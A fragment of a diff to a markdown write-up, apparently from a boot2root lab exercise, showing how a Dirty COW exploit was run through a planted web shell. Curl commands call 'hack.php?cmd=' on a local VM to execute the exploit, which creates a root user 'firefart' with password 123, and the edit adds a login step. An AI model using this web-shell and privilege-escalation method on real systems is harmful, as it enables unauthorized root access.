HalimHamidov/42_boot2root/bonus/Dirty_COW_using_SQL_Injection.md

 	curl --insecure "https://192.168.56.102/forum/templates_c/hack.php?cmd=ls" # check if it correct compile curl --insecure "https://192.168.56.102/forum/templates_c/hack.php?cmd=./exploit%20123"

 And we have `firefart` user with password 123 which is root.
-But I don't now how log in because su or su -c can't get `passwd` as argument.
+Now just go to the VM interface, and log in directly into `firefart` using password `123`. **You are root now!**